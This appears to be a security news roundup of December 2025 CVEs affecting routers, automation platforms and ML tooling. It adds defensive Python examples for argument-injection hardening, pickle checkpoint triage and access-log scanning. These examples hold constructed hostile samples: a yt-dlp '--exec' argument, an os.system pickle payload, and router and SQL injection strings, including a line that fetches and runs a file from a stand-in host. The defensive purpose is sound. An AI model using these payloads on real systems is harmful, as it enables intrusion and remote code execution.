Multiple High-Impact Vulnerabilities Disclosed Across Diverse Software Products
A series of critical and high-severity vulnerabilities has been disclosed across a wide range of software products, including network devices, workflow automation platforms, document management systems, and developer tools. Notable issues include command injection flaws in TRENDnet TEW-800MB routers (CVE-2025-15136, CVE-2025-15137); remote code execution in Xspeeder SXZOS (CVE-2025-54322), Eigent (CVE-2025-68952), StreamVault (CVE-2025-66203), n8n (CVE-2025-68668), and Yealink T21P_E2 phones (CVE-2025-66738); authentication bypasses in IBM API Connect (CVE-2025-13915) and Eaton UPS Companion (CVE-2025-59887); a session token capture flaw in M-Files Server (CVE-2025-13008); prototype pollution in apidoc-core (CVE-2025-13158); and an unauthenticated blind SQL injection in Cloudlog (CVE-2024-44065). Several of these are remotely exploitable, and for some, exploit code is already public.
Vendors have shipped patches for many of the affected products, including Eigent, StreamVault, LMDeploy, and n8n, while others, such as the TRENDnet flaws, have public exploits and no vendor response. The impact ranges from arbitrary code execution and privilege escalation to unauthorized access and data exposure. Organizations running the affected products should review the relevant advisories, apply available patches, and, where no patch exists, restrict network access to the vulnerable interfaces. The breadth and severity of these disclosures underscore the importance of timely vulnerability management and monitoring across the software supply chain.
Timeline
Dec 28, 2025
Second TRENDnet TEW-800MB command injection flaw disclosed in NTPSyncWithHost.cgi
CVE-2025-15137 was published for TRENDnet TEW-800MB, describing remote command injection in the NTPSyncWithHost.cgi sub_F934 function. The advisory noted public exploit availability and that no official patch or vendor response had been provided as of publication.
Dec 28, 2025
TRENDnet TEW-800MB wizardset command injection disclosed without vendor response
CVE-2025-15136 was published for TRENDnet TEW-800MB 1.0.1.0, where the do_setWizard_asp function in /goform/wizardset could be abused for remote command execution via the WizardConfigured argument. The disclosure said the vendor had been notified but had not responded, and public exploits were already available.
Dec 27, 2025
PHP patches PDO PostgreSQL null pointer dereference across supported branches
CVE-2025-14180 was published for multiple PHP branches using the PDO PostgreSQL driver with emulated prepares enabled, where invalid character sequences could trigger a null pointer dereference and crash the process. PHP maintainers released fixes for affected versions and advised immediate upgrades. Because the crash path requires emulated prepares, disabling PDO::ATTR_EMULATE_PREPARES (so the server performs parameter binding) is a reasonable interim mitigation until the upgrade is applied.
Dec 27, 2025
Xspeeder SXZOS unauthenticated root RCE vulnerability published
CVE-2025-54322 was disclosed for Xspeeder SXZOS, allowing unauthenticated attackers to execute root-level commands through base64-encoded Python code in the chkid parameter of vLogin.py. The advisory recommended sanitizing input, restricting access, and updating to the latest version.
Dec 27, 2025
Eigent 1-click RCE vulnerability fixed in version 0.0.61
CVE-2025-68952 was disclosed for Eigent 0.0.60, describing a one-click remote code execution flaw that could execute arbitrary code on a victim machine or server after a single user interaction. The issue was patched in version 0.0.61, and public GitHub PoC material was referenced.
Dec 27, 2025
StreamVault authenticated RCE disclosed and patched in version 251126
CVE-2025-66203 was published for StreamVault versions prior to 251126, where authenticated administrators could inject malicious yt-dlp arguments through /admin/api/saveConfig and achieve remote code execution. The vendor patched the issue in version 251126 and public advisories and PoC material were available.
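The StreamVault issue is an argument-injection pattern that is worth seeing in code. The following is an added Python example, not StreamVault's code: a configuration field of extra yt-dlp arguments is passed straight to the command line, and because yt-dlp has options such as --exec that run a shell command after download, an admin who controls that field gets code execution without a single shell metacharacter (quoting the value does not help, since no shell is involved). The hardened builder allowlists option names, rejects values that look like options, and ends the option list with an optparse-style "--" so the URL can never be parsed as a flag. The allowlist contents, the sample URL and the hostile argument string are assumptions constructed for the example.

```python
"""Argument injection through a pass-through "extra arguments" field.

Added example, not StreamVault's code. Option names come from yt-dlp's
documented CLI; the allowlist itself is an assumption about what an operator
would want to permit.
"""
import shlex

# Options a deployment might let an admin set, with whether each takes a value.
ALLOWED_OPTIONS = {
    "--format": True, "-f": True,
    "--output": True, "-o": True,
    "--retries": True,
    "--no-playlist": False,
}

# yt-dlp options that execute commands or load code/config; used only to label argv.
DANGEROUS_OPTIONS = {"--exec", "--exec-before-download", "--use-postprocessor", "--config-locations"}


def build_cmd_vulnerable(url: str, extra_args: str) -> list[str]:
    """Vulnerable: the config field is split and handed to yt-dlp unchanged.

    No shell is involved, so escaping does nothing; the injected token is
    itself a yt-dlp option that runs a command once the download finishes.
    """
    return ["yt-dlp", *shlex.split(extra_args), url]


def build_cmd_hardened(url: str, extra_args: str) -> list[str]:
    """Hardened: allowlisted option names, option-shaped values rejected, '--' before the URL."""
    if not url.startswith(("http://", "https://")):
        raise ValueError("url must be absolute http(s)")
    argv = ["yt-dlp"]
    tokens = shlex.split(extra_args)
    i = 0
    while i < len(tokens):
        name, has_eq, inline_value = tokens[i].partition("=")
        if name not in ALLOWED_OPTIONS:
            raise ValueError(f"option not allowed: {name!r}")
        if not ALLOWED_OPTIONS[name]:           # flag without a value
            if has_eq:
                raise ValueError(f"{name!r} takes no value")
            argv.append(name)
            i += 1
            continue
        if has_eq:
            value, i = inline_value, i + 1
        else:
            if i + 1 >= len(tokens):
                raise ValueError(f"missing value for {name!r}")
            value, i = tokens[i + 1], i + 2
        if value.startswith("-"):
            # "-f --exec" smuggling: a value must never be parsed as another option
            raise ValueError(f"value for {name!r} looks like an option: {value!r}")
        argv += [name, value]
    # optparse-style terminator: everything after it is positional, so the URL
    # cannot be read as an option even if it starts with '-'.
    argv += ["--", url]
    return argv


def dangerous_flags(argv: list[str]) -> set[str]:
    """Which command-executing yt-dlp options an argv would pass."""
    return {tok.split("=", 1)[0] for tok in argv if tok.startswith("-")} & DANGEROUS_OPTIONS


def is_rejected(url: str, extra_args: str) -> bool:
    """True if the hardened builder refuses this configuration."""
    try:
        build_cmd_hardened(url, extra_args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    url = "https://example.invalid/watch?v=1"      # constructed
    hostile = '--exec "touch /tmp/pwned"'           # constructed admin-controlled field
    print(build_cmd_vulnerable(url, hostile), dangerous_flags(build_cmd_vulnerable(url, hostile)))
    print(build_cmd_hardened(url, "-f best --retries 3"))
    print(is_rejected(url, hostile), is_rejected(url, "-f --exec"))
```

The lesson generalizes beyond yt-dlp: any "extra arguments" setting for a tool that has its own command-executing options (tar, rsync, git, ffmpeg and most downloaders) is a code-execution sink for whoever can write that setting, so the fix is an allowlist of option names, not escaping.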
Dec 27, 2025
M-Files discloses session token capture flaw and releases patched versions
CVE-2025-13008 was disclosed for M-Files Server's web interface, allowing authenticated attackers to capture and reuse session tokens from other active users. Patched versions were released across affected branches, and organizations were urged to prioritize updates and monitor for abuse.
Dec 26, 2025
LMDeploy patches insecure deserialization flaw in version 0.11.1
CVE-2025-67729 was published for LMDeploy, where unsafe use of torch.load() could allow arbitrary code execution when loading malicious model checkpoint files. The vulnerability was fixed in LMDeploy 0.11.1, and users were advised not to load untrusted model files.
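The LMDeploy entry is the general "pickle is code" problem: a pickle stream can name any importable callable (GLOBAL / STACK_GLOBAL opcodes) and call it (REDUCE and related opcodes), so torch.load() on an untrusted file is remote code execution. The durable fixes are torch.load(..., weights_only=True) or a non-executable format such as safetensors. The following added Python example, not LMDeploy's code, shows the triage step a practitioner can run on any pickle-based checkpoint before loading it: walk the opcodes with the standard library's pickletools (which never executes them), list every import the file would perform, and refuse anything outside an allowlist. The allowlist, the benign state-dict and the malicious payload are constructed for the example; the payload is only ever pickled here, never unpickled.

```python
"""Triage a pickle-based checkpoint without unpickling it.

Added example, not LMDeploy code. pickletools.genops walks opcodes without
executing them, so the imports a stream would perform can be inspected first.
"""
import os
import pickle
import pickletools
from collections import OrderedDict

# Globals a plain state_dict pickle needs. Assumption: a real deployment extends
# this with the framework's own safe-globals list rather than hand-picking names.
SAFE_GLOBALS = {("collections", "OrderedDict")}

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
              "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
CALL_OPS = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def pickle_imports(data: bytes) -> list[tuple[str, str]]:
    """(module, name) pairs the stream would import, found by opcode walk only."""
    imports, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            strings.append(arg)
        elif op.name == "GLOBAL":                 # protocol <= 3: "module name"
            module, name = arg.split(" ", 1)
            imports.append((module, name))
        elif op.name == "STACK_GLOBAL":           # protocol 4+: two preceding string pushes
            # The pickler always pushes module and name right before this opcode.
            # A hand-crafted stream could reuse memoised strings (BINGET) instead;
            # this simple walker does not resolve those, so treat it as a first filter.
            if len(strings) < 2:
                raise ValueError("STACK_GLOBAL without module/name strings")
            name, module = strings.pop(), strings.pop()
            imports.append((module, name))
    return imports


def checkpoint_report(data: bytes) -> dict:
    """Decide whether a checkpoint is safe to unpickle, and say why not."""
    try:
        imports = pickle_imports(data)
        calls = sum(1 for op, _, _ in pickletools.genops(data) if op.name in CALL_OPS)
    except (ValueError, IndexError) as exc:
        # malformed or truncated stream: refuse rather than guess
        return {"safe": False, "imports": [], "unexpected": [], "calls": 0, "reason": str(exc)}
    unexpected = [imp for imp in imports if imp not in SAFE_GLOBALS]
    return {"safe": not unexpected, "imports": imports, "unexpected": unexpected, "calls": calls,
            "reason": "" if not unexpected else f"imports outside allowlist: {unexpected}"}


# --- constructed samples -----------------------------------------------------
class _RunOnLoad:
    """Pickles to a call of os.system; the object is never unpickled in this example."""
    def __reduce__(self):
        return (os.system, ("echo pwned",))


MALICIOUS_CKPT = pickle.dumps(_RunOnLoad())                            # constructed
BENIGN_CKPT = pickle.dumps(OrderedDict([("layer.weight", [0.1, 0.2]),   # constructed
                                        ("layer.bias", [0.0])]))

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_CKPT), ("malicious", MALICIOUS_CKPT)):
        print(label, checkpoint_report(blob))
```

Note that the malicious stream contains exactly one import and one REDUCE, the same opcode count as a harmless OrderedDict, which is why counting calls is not enough and the import allowlist is the check that matters.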
Dec 26, 2025
n8n discloses and patches Python Code Node sandbox escape in 2.0.0
CVE-2025-68668 was disclosed for n8n versions 1.0.0 up to but not including 2.0.0, where authenticated users with workflow permissions could escape the Pyodide-based Python Code Node sandbox and execute host commands. The issue was patched in version 2.0.0, with workarounds including disabling the Code Node or Python support.
Dec 26, 2025
Yealink T21P_E2 phone RCE vulnerability published
CVE-2025-66738 was disclosed for the Yealink T21P_E2 phone running firmware 52.84.0.15, allowing a remote attacker with ordinary (non-administrative) user privileges to execute arbitrary code through the diagnostic ping function. Recommended mitigations included firmware updates and restricting access to the diagnostic interface.
Dec 26, 2025
apidoc-core prototype pollution flaw disclosed with GitHub PoC
CVE-2025-13158 was published for apidoc-core from version 0.2.0 onward, describing a remotely exploitable prototype pollution issue in multiple worker modules via the define property. The disclosure noted GitHub proof-of-concept code and advised updating to a patched release.
Dec 26, 2025
IBM API Connect authentication bypass vulnerability published
CVE-2025-13915 was disclosed for IBM API Connect versions 10.0.8.0 through 10.0.8.5 and 10.0.11.0, allowing remote attackers to bypass authentication and gain unauthorized access. IBM recommended applying fixed versions and verifying authentication controls.
Dec 26, 2025
Eaton discloses and fixes UPS Companion library authentication bypass
Eaton disclosed CVE-2025-59887 in its UPS Companion installer, where improper authentication of library files could enable arbitrary code execution through search order hijacking. Eaton released a patched version and published remediation guidance the same day.
Dec 26, 2025
Gitea fixes attachment file extension bypass in version 1.23.0
A high-severity vulnerability tracked as CVE-2025-68939 was disclosed for Gitea versions before 1.23.0, allowing attackers to bypass attachment file extension restrictions by editing attachment names. The issue was addressed in Gitea 1.23.0, and users were urged to upgrade.
Dec 26, 2025
UTT 512W buffer overflow flaw disclosed with public PoC
CVE-2025-15092 was published for UTT 进取 512W devices running firmware up to 1.7.7-171114, describing a remotely exploitable strcpy-based buffer overflow in /goform/ConfigExceptMSN via the remark argument. The disclosure noted public proof-of-concept exploits and recommended updating firmware beyond the affected version.
Dec 26, 2025
Cloudlog blind SQL injection vulnerability published as CVE-2024-44065
A critical unauthenticated time-based blind SQL injection flaw affecting Cloudlog 2.6.15 at /index.php/logbookadvanced/search via the qsoresults parameter was publicly disclosed under CVE-2024-44065. Public proof-of-concept code was available, and users were advised to update and to harden input handling with parameterized queries.
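Several entries above share one property a defender can act on before a patch exists: the hostile input arrives as an HTTP parameter to a known path. This applies to the TRENDnet /goform/wizardset and NTPSyncWithHost.cgi command injections, the UTT /goform/ConfigExceptMSN remark overflow, and the Cloudlog qsoresults blind SQL injection. The following added Python example, not part of any of the advisories or vendor code, scans constructed Apache combined-format access-log lines for the three request shapes involved: time-based blind SQL injection payloads (SLEEP, BENCHMARK, pg_sleep, WAITFOR DELAY), shell separators or download tools inside CGI parameters, and oversized values aimed at strcpy-style buffers. The endpoint paths are taken from the disclosures; the log lines, addresses, timestamps and length threshold are constructed. Consumer routers rarely keep access logs, so in practice this runs on a reverse proxy or WAF in front of the device, and since POST bodies are not in access logs, only query strings are inspected.

```python
"""Flag injection-shaped parameter values in web access logs.

Added example; the log lines, addresses and thresholds are constructed.
Covers three request shapes from this roundup: time-based blind SQLi,
command injection into CGI parameters, and oversized values aimed at
fixed-size buffers.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache/nginx combined format: ip ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# MySQL SLEEP/BENCHMARK, PostgreSQL pg_sleep, MSSQL WAITFOR DELAY
SQLI_TIME_RE = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)
# shell separators/substitution, plus the fetch-and-run tools typical of router exploits;
# a raw '&' only survives parse_qsl if it was percent-encoded, which is itself a signal
CMDI_RE = re.compile(r"[;|&`]|\$\(|\b(?:wget|curl|tftp|telnetd|busybox)\b", re.I)

MAX_VALUE_LEN = 256  # assumption: tune per endpoint; /goform text fields are short


def classify_value(value: str, max_len: int = MAX_VALUE_LEN) -> set[str]:
    """Tag one decoded parameter value; decodes once more to catch double encoding."""
    decoded = unquote_plus(value)
    tags = set()
    if SQLI_TIME_RE.search(decoded):
        tags.add("sqli-time-based")
    if CMDI_RE.search(decoded):
        tags.add("cmd-injection")
    if len(decoded) > max_len:
        tags.add("oversized-value")
    return tags


def scan_log(lines: list[str]) -> list[dict]:
    """Return one finding per suspicious parameter, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format or malformed: skip rather than crash the scan
        url = urlsplit(m["target"])
        for param, value in parse_qsl(url.query, keep_blank_values=True):
            tags = classify_value(value)
            if tags:
                findings.append({"ip": m["ip"], "time": m["ts"], "path": url.path,
                                 "param": param, "tags": sorted(tags), "value": value[:80]})
    return findings


# Constructed sample: a benign search, a SLEEP() probe against the Cloudlog
# endpoint, a CGI command injection, and an oversized /goform value.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Dec/2025:10:01:02 +0000] "GET /index.php/logbookadvanced/search?qsoresults=K1ABC HTTP/1.1" 200 512',
    '203.0.113.5 - - [26/Dec/2025:10:01:09 +0000] "GET /index.php/logbookadvanced/search?qsoresults=1%27%20AND%20SLEEP%285%29--%20 HTTP/1.1" 200 512',
    '198.51.100.7 - - [28/Dec/2025:11:20:30 +0000] "GET /goform/wizardset?WizardConfigured=1%3Bwget%20http%3A%2F%2F198.51.100.9%2Fx%3Bsh%20x HTTP/1.1" 200 88',
    '198.51.100.7 - - [26/Dec/2025:11:21:00 +0000] "GET /goform/ConfigExceptMSN?remark=' + "A" * 600 + ' HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The time-based case deserves one caveat: a blind SLEEP probe returns the same 200 status as a normal search, so status-code alerting never sees it; the payload pattern, or a per-request latency field if the proxy logs one, is the only signal.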
Related Stories

Multiple High-Impact Vulnerabilities Disclosed Across Diverse Software Platforms
A series of critical and high-severity vulnerabilities has been disclosed affecting a wide range of software products, including workflow automation tools, web applications, network devices, and desktop software. Notable issues include remote code execution (RCE) flaws in *n8n*, *Lilac-Reloaded for Nagios*, *FileZilla Client*, and *AVideo*, as well as privilege escalation vulnerabilities in products like *Versa SASE Client*, *AspEmail*, and *ActFax*. Several vulnerabilities allow unauthenticated attackers to upload arbitrary files, bypass authentication, or exploit weak session management, potentially leading to full system compromise or unauthorized access to sensitive data. Many of these vulnerabilities have public exploits available, increasing the risk of active exploitation in the wild. Vendors have released patches for several of the affected products, and administrators are strongly advised to update to the latest versions or apply recommended mitigations. The vulnerabilities span a variety of attack vectors, including buffer overflows, improper input validation, insecure file upload mechanisms, and misconfigured authentication endpoints. Organizations should prioritize patching systems exposed to the internet and review access controls to limit the impact of potential exploitation. Immediate attention is warranted for products with critical CVSS scores and those with known public exploits.
1 month ago
Multiple Unrelated Critical Vulnerabilities Disclosed in October 2025
A series of critical and high-severity vulnerabilities affecting a diverse set of software products were publicly disclosed in October 2025. Epsilon RH by Grupo Castilla was found to have a SQL injection vulnerability (CVE-2025-41028) that allows attackers to manipulate the database by sending crafted POST requests to the 'sEstadoUsr' parameter in the '/epsilonnetws/WSAvisos.asmx' endpoint. Lanscope Endpoint Manager (CVE-2025-61932) was reported to have an improper origin verification flaw, enabling attackers to execute arbitrary code via specially crafted packets, though remote exploitation is not possible. Galaxy Software Services Vitals ESP Forum Module (CVE-2025-31342) was discovered to allow remote authenticated users to upload dangerous files, leading to arbitrary command execution. Fsas Technologies Inc.'s ETERNUS SF (CVE-2025-62577) contains incorrect default permissions, allowing low-privileged users to obtain database credentials and potentially escalate privileges to execute OS commands as an administrator. Excellent Infotek's Document Management System (CVE-2025-11948) is vulnerable to unauthenticated arbitrary file upload, enabling attackers to deploy web shells and execute code on the server. Vvveb CMS up to version 1.0.5 is susceptible to authenticated code injection via its Code Editor, allowing attackers to modify files and achieve remote code execution. The Theme Editor plugin for WordPress (CVE-2025-9890) is vulnerable to cross-site request forgery, which can be exploited to achieve remote code execution if an administrator is tricked into clicking a malicious link. The PPOM plugin for WooCommerce (CVE-2025-11391) allows unauthenticated arbitrary file uploads, posing a severe risk to affected e-commerce sites. 
The Appointments plugin for WordPress (CVE-2017-20206) and the Flickr Gallery plugin (CVE-2017-20207) both suffer from unauthenticated PHP object injection vulnerabilities, which have been actively exploited to create backdoors using the WP_Theme() class. RegistrationMagic (CVE-2017-20208) is also affected by a PHP object injection flaw, allowing attackers to fetch and install remote files. Finally, BLU-IC2 and BLU-IC4 devices (CVE-2025-11925) have an API that returns an incorrect Content-Type header, potentially enabling HTML/JavaScript injection in responses. Each of these vulnerabilities presents a significant risk, with several allowing remote code execution, privilege escalation, or the installation of persistent backdoors. The affected products span web applications, content management systems, endpoint management tools, and specialized enterprise software. Security teams are advised to review the specific advisories, apply patches or mitigations where available, and monitor for signs of exploitation, as several vulnerabilities have been reported as actively exploited in the wild. The diversity and severity of these disclosures underscore the ongoing need for rigorous vulnerability management and timely response to public advisories.
1 month ago
Multiple Security Vulnerabilities Disclosed Across Major Software Platforms
Several major software vendors, including Mozilla, Node.js, SonicWall, Cisco, Google, Apple, Ubuntu, Red Hat, VMware, and TeamViewer, have disclosed security vulnerabilities affecting a wide range of products. These advisories highlight issues such as OS command injection in the Node.js `systeminformation` library, privilege escalation in SonicWall SMA1000, improper input validation in Cisco Secure Email Gateway, and multiple vulnerabilities in browsers like Firefox and Chrome. Additionally, Apple products, Epson printers, and TeamViewer DEX Client have been identified as having critical security flaws, with some advisories noting the potential for remote code execution or privilege escalation if left unpatched. Security agencies and vendors are urging users and administrators to review the relevant advisories and apply patches or mitigations as soon as possible. The vulnerabilities span operating systems (Linux kernel in Ubuntu and Red Hat), cloud and virtualization platforms (VMware Tanzu), and widely used remote access tools (TeamViewer). The breadth of affected products underscores the importance of timely updates and vigilance in monitoring official security channels for new disclosures and remediation guidance.
1 month ago